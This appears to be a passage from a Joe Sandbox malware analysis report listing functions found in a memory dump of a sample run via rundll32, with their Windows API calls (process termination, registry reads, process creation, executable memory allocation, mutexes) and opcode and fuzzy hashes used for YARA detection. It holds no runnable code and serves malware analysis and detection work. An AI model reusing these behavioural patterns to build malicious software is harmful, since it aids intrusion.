                                                          • Instruction Fuzzy Hash: 76112C76911228BFDF626A96EC09CEF7F7EFF89290B100461FA09E1150D6314A55EBF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628C8EF Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0628C917
                                                          • _strupr.NTDLL ref: 0628C952
                                                          • lstrlen.KERNEL32(00000000), ref: 0628C95A
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0628C999
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0628C9A0
                                                          • GetLastError.KERNEL32 ref: 0628C9A8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 110452925-0
                                                          • Opcode ID: 73486db6c90b449b3472fb2b03b66a449360b47646127853e38fa9e77c827d57
                                                          • Instruction ID: c9f65249bae50b38210c2b5a80ccc14a7780242e1246929794519d9afa179a01
                                                          • Opcode Fuzzy Hash: 73486db6c90b449b3472fb2b03b66a449360b47646127853e38fa9e77c827d57
                                                          • Instruction Fuzzy Hash: B411B272B11305EFDB517B74AC8CDBE37AEABC8659B104455BE06E2080DB748894CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628B549 Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 0628B567
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0628B595
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628B5A7
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0628B5CC
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628B5E7
                                                          • RegCloseKey.ADVAPI32(?), ref: 0628B5F1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                          • String ID:
                                                          • API String ID: 170146033-0
                                                          • Opcode ID: 3f57d0fd2a0f494d18ff7b14b78950548b0c0ad67ddf867ec81158ba372099ca
                                                          • Instruction ID: 9f0d09a73f2dd06232a71d10d27488dc7ab2f5094b59a8f2bc74c739569268b3
                                                          • Opcode Fuzzy Hash: 3f57d0fd2a0f494d18ff7b14b78950548b0c0ad67ddf867ec81158ba372099ca
                                                          • Instruction Fuzzy Hash: 4F11FC75900209FFDB51DF99EC88CEEBBFEEB89305B144069EA01E2114E7355A55DF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627A5E7 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5F8
                                                          • lstrlen.KERNEL32(?,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5FF
                                                          • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0627A611
                                                          • _snprintf.NTDLL ref: 0627A637
                                                            • Part of subcall function 0628C01F: memset.NTDLL ref: 0628C034
                                                            • Part of subcall function 0628C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0628C06D
                                                            • Part of subcall function 0628C01F: wcstombs.NTDLL ref: 0628C077
                                                            • Part of subcall function 0628C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0628C0A8
                                                            • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0D4
                                                            • Part of subcall function 0628C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0628C0EA
                                                            • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0FE
                                                            • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C131
                                                            • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C136
                                                          • _snprintf.NTDLL ref: 0627A66B
                                                            • Part of subcall function 0628C01F: GetLastError.KERNEL32 ref: 0628C102
                                                            • Part of subcall function 0628C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0628C122
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0627A688
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                          • String ID:
                                                          • API String ID: 1481739438-0
                                                          • Opcode ID: d1f103284b8fb87ba1f93a82116470200b8bea7c92a81430e5e7dfb78f323c62
                                                          • Instruction ID: f8598b95317ba1ca8a0646c0abd1fb6f8dfccd8ad7cd7f41579abf44ab31e5db
                                                          • Opcode Fuzzy Hash: d1f103284b8fb87ba1f93a82116470200b8bea7c92a81430e5e7dfb78f323c62
                                                          • Instruction Fuzzy Hash: 2B118EB2600219BFCF12AF54EC88D9E7F6EEB883A4B054015FE099B251D631DA14DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628F791 Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(0627261E,00000000,00000000,00000008,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F7A7
                                                          • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0628F7BA
                                                          • lstrcpy.KERNEL32(00000008,0627261E), ref: 0628F7DC
                                                          • GetLastError.KERNEL32(06274A0A,00000000,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F805
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F81D
                                                          • CloseHandle.KERNEL32(00000000,06274A0A,00000000,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F826
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 2860611006-0
                                                          • Opcode ID: 03d46a012cc618f8f91b649499935b5b190d0dc55294606abc78ced760d2ac3e
                                                          • Instruction ID: b1ee87968d4ddf16c2f966cd36a86392eb40aa2661b5becb736717a26e26bc44
                                                          • Opcode Fuzzy Hash: 03d46a012cc618f8f91b649499935b5b190d0dc55294606abc78ced760d2ac3e
                                                          • Instruction Fuzzy Hash: BF11BE3161134AEFDB41AF65EC8889EBBA9FF442A4700442AFE1AD7250E7309C15CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628508C Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                          • GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                          • lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 1175089793-0
                                                          • Opcode ID: 62402c6839bd88590731f37dca78b9df5fc720f4cf4d8c085ee76bf26bfdfda7
                                                          • Instruction ID: 7965106d2ebfb6a6faac542d51bf3381f9394d50c2e4232b2c70f64e377621ed
                                                          • Opcode Fuzzy Hash: 62402c6839bd88590731f37dca78b9df5fc720f4cf4d8c085ee76bf26bfdfda7
                                                          • Instruction Fuzzy Hash: 3D01A132E212157FD7916FAAAC8CE6F3BADAFC5A447090419BE00F3140DA70E800CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06274F2E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06274FB8
                                                          • lstrlen.KERNEL32(?,?), ref: 06274FE9
                                                          • memcpy.NTDLL(00000008,?,00000001), ref: 06274FF8
                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 0627507A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlenmemcpy
                                                          • String ID: W
                                                          • API String ID: 379260646-655174618
                                                          • Opcode ID: a30955428a3e0253bc330a352156d9fa9dc918a57b19e3bd92cad371b35706aa
                                                          • Instruction ID: 3530b21a02346f8023e270898e7fbdd76840e16cc0f3e920aed8c858c1764799
                                                          • Opcode Fuzzy Hash: a30955428a3e0253bc330a352156d9fa9dc918a57b19e3bd92cad371b35706aa
                                                          • Instruction Fuzzy Hash: F741E6309203079FCBA49F5CD885FAAB7E9EF09304F14842AED59CB250C7359585CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628596C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 06285A17
                                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 06285A84
                                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 06285A8E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BuffersErrorFileFlushLastmemset
                                                          • String ID: K$P
                                                          • API String ID: 3817869962-420285281
                                                          • Opcode ID: 0d65fb58ce09181f1f79112f2d6538140693ef92bfb53b3691b513578b9a3eff
                                                          • Instruction ID: 9465061c4c14837618cd561475342ea7123e63aea6a067e426b18793fb620147
                                                          • Opcode Fuzzy Hash: 0d65fb58ce09181f1f79112f2d6538140693ef92bfb53b3691b513578b9a3eff
                                                          • Instruction Fuzzy Hash: E3419F30A2170A9FDBA1DF64CDC46AEBBF1FF44700F14892DE896A3680D334A914CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627D0E3 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,0627DE40,00000000,?,?,?,0627DE40,?,?,?,?,?), ref: 0627D121
                                                          • lstrlen.KERNEL32(0627DE40,?,?,?,0627DE40,?,?,?,?,?), ref: 0627D13F
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0627D1AE
                                                          • lstrlen.KERNEL32(0627DE40,00000000,00000000,?,?,?,0627DE40,?,?,?,?,?), ref: 0627D1CF
                                                          • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0627D1E3
                                                          • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0627D1EC
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0627D1FA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$FreeLocal
                                                          • String ID:
                                                          • API String ID: 1123625124-0
                                                          • Opcode ID: e16bf48b0ea8c5e999ebcb538cd8750335e496c156eadb6fabf2d79f087ba40a
                                                          • Instruction ID: 7eacf6bcae3c920f948a794d4e4f36c94af7291640113fb70497438953c477cf
                                                          • Opcode Fuzzy Hash: e16bf48b0ea8c5e999ebcb538cd8750335e496c156eadb6fabf2d79f087ba40a
                                                          • Instruction Fuzzy Hash: 8141167281021AEFDF51DF68EC4599B3BA9EF542A0B054425FD18A7211E731DE60CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06272009 Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,06272028,?), ref: 0627867A
                                                            • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,06272028,?), ref: 06278697
                                                          • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 06272055
                                                          • lstrlenW.KERNEL32(00000008,?,?,?), ref: 0627205C
                                                          • lstrlenW.KERNEL32(?,?,?,?,?), ref: 0627207A
                                                          • lstrlen.KERNEL32(00000000,?,00000000), ref: 06272138
                                                          • lstrlenW.KERNEL32(?), ref: 06272143
                                                          • wsprintfA.USER32 ref: 06272185
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                            • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
                                                            • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                            • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                            • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                            • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                            • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                                                          • String ID:
                                                          • API String ID: 1727939831-0
                                                          • Opcode ID: ad3aa6dfbe91be556d82e8251a49608bbb460e4cd560b88302dd634816bc4b39
                                                          • Instruction ID: 4d6f6938bc097f6e9cfa869f8e2ed95fd5ff35d227622a4dd073f49c8f775652
                                                          • Opcode Fuzzy Hash: ad3aa6dfbe91be556d82e8251a49608bbb460e4cd560b88302dd634816bc4b39
                                                          • Instruction Fuzzy Hash: 0A514E7191020AEFDF81EFA9DC48DAE7BBAFF88204B054025ED24A7211DB35DA11DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06277DF5 Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,06285583,00000000,00000000), ref: 06277E46
                                                          • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 06277ED9
                                                          • GetLastError.KERNEL32(?,?,0000011F), ref: 06277F31
                                                          • GetLastError.KERNEL32 ref: 06277F63
                                                          • GetLastError.KERNEL32 ref: 06277F77
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,06285583,00000000,00000000,?,06273EC6,?), ref: 06277F8C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$memcpy
                                                          • String ID:
                                                          • API String ID: 2760375183-0
                                                          • Opcode ID: 8bdb2d859482c0eebfd7fbfa9fc49a98c8e556825a73b26a15cb3456b78610ea
                                                          • Instruction ID: 7434599d2a848878770da6d38e5c913c908baf461c2f5229b8724dbb6e4c0fdd
                                                          • Opcode Fuzzy Hash: 8bdb2d859482c0eebfd7fbfa9fc49a98c8e556825a73b26a15cb3456b78610ea
                                                          • Instruction Fuzzy Hash: C15168B1920209AFEB50DFA5DC88EAEBBB9EB48354F108429FD14E6240D3748A54CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628ADF7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(?,00000020), ref: 0628AEF4
                                                          • lstrcat.KERNEL32(?,00000020), ref: 0628AF09
                                                          • lstrcmp.KERNEL32(00000000,?), ref: 0628AF20
                                                          • lstrlen.KERNEL32(?), ref: 0628AF44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 17547d52646efbb4a4bde35406953668589fa7bdad2b4fb8557b4d73791e4221
                                                          • Instruction ID: 91ea27631277b7f635887082123d0f67b92f7a605810c7453c7195027637878f
                                                          • Opcode Fuzzy Hash: 17547d52646efbb4a4bde35406953668589fa7bdad2b4fb8557b4d73791e4221
                                                          • Instruction Fuzzy Hash: 3B51E471E11209EFDF51EF99CC846ADBBB6EF64314F048467EC159B281CB71AA41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627D581 Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5A3
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5B4
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5C6
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5D8
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5EA
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5F6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          • Opcode ID: 9fdb5c3bf7d6da7260adbbd1dbad591776164470898e93d350912805fee546bb
                                                          • Instruction ID: 59763e4109bb807ad5f78595756851bd5c797f55641192ac486e91268053794f
                                                          • Opcode Fuzzy Hash: 9fdb5c3bf7d6da7260adbbd1dbad591776164470898e93d350912805fee546bb
                                                          • Instruction Fuzzy Hash: 05412D71E2060BAFDB50DFA9D880E6EB7F9FF88204B14896DD955E7200D774EA448B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285C28 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062824C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 062824CF
                                                            • Part of subcall function 062824C3: SetLastError.KERNEL32(000000B7,?,06285C3C,?,?,00000000,?,?,?), ref: 062824E0
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 06285C5C
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 06285D34
                                                            • Part of subcall function 0627A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0627A990
                                                            • Part of subcall function 0627A976: CreateWaitableTimerA.KERNEL32(0629A1E8,00000001,?), ref: 0627A9AD
                                                            • Part of subcall function 0627A976: GetLastError.KERNEL32(?,00000000,06288C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0627A9BE
                                                            • Part of subcall function 0627A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627A9FE
                                                            • Part of subcall function 0627A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA1D
                                                            • Part of subcall function 0627A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA33
                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 06285D1D
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 06285D26
                                                            • Part of subcall function 062824C3: CreateMutexA.KERNEL32(0629A1E8,00000000,?,?,06285C3C,?,?,00000000,?,?,?), ref: 062824F3
                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 06285D41
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                          • String ID:
                                                          • API String ID: 1700416623-0
                                                          • Opcode ID: 087f69d7ab176384251ad503badebecee14e07c8755183b24e879d42eed2e0d1
                                                          • Instruction ID: cd466cd155160b38fd9427f2cbb1645c28f2ae0f8db13e2a8371780e6ea6805b
                                                          • Opcode Fuzzy Hash: 087f69d7ab176384251ad503badebecee14e07c8755183b24e879d42eed2e0d1
                                                          • Instruction Fuzzy Hash: DE319075A213059FCB81BF74EC4CD6E7BBAEBC92107244825EE16EB290E6318800CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628C20F Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 0628C228
                                                            • Part of subcall function 0627A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,06277D5E), ref: 0627A6BE
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,062789E4,00000000), ref: 0628C26A
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0628C2BC
                                                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,062789E4,00000000), ref: 0628C2D5
                                                            • Part of subcall function 0627E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0627EA0D
                                                            • Part of subcall function 0627E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,0628C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 0627EA50
                                                          • GetLastError.KERNEL32(?,00000000,062789E4,00000000,?,?,?,?,?,?,?,06279100,?), ref: 0628C30D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                          • String ID:
                                                          • API String ID: 1921436656-0
                                                          • Opcode ID: 020bf3aea8778c235151b867b0669c7f284a7238123e88afe2a7b8353a7657cd
                                                          • Instruction ID: edbc3df33f069e2445b29a0fae5b872b94c5234b1b80ce7c888dfabc2d0fe873
                                                          • Opcode Fuzzy Hash: 020bf3aea8778c235151b867b0669c7f284a7238123e88afe2a7b8353a7657cd
                                                          • Instruction Fuzzy Hash: 8D313971E21305AFDF91EFA5DC45AAEBBB5EB48750F000066EE05A7280D7749A45CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06279FF6 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0627A078
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627A091
                                                          • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0627A09E
                                                          • lstrlen.KERNEL32(0629B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 0627A0B0
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0627A0E1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                          • String ID:
                                                          • API String ID: 2734445380-0
                                                          • Opcode ID: 37e6b22cd06e8e66a0412aa5d2cccdceaa31be112e6363379f9bb1c5ea9f3c10
                                                          • Instruction ID: b0daa4075c12a6eefb240ce57008fccec881dca80a9303907b760ccffd6f3a42
                                                          • Opcode Fuzzy Hash: 37e6b22cd06e8e66a0412aa5d2cccdceaa31be112e6363379f9bb1c5ea9f3c10
                                                          • Instruction Fuzzy Hash: 32314872910209AFCB11DF99DC89EEE7BB9EF85320F008514FE19A2200E7759A55DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627DD77 Relevance: 7.6, APIs: 5, Instructions: 91memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,06273DA2,00000000,00000001,?,?,?), ref: 0627DD92
                                                          • lstrlen.KERNEL32(?), ref: 0627DDA2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627DDD6
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0627DE01
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0627DE20
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627DE81
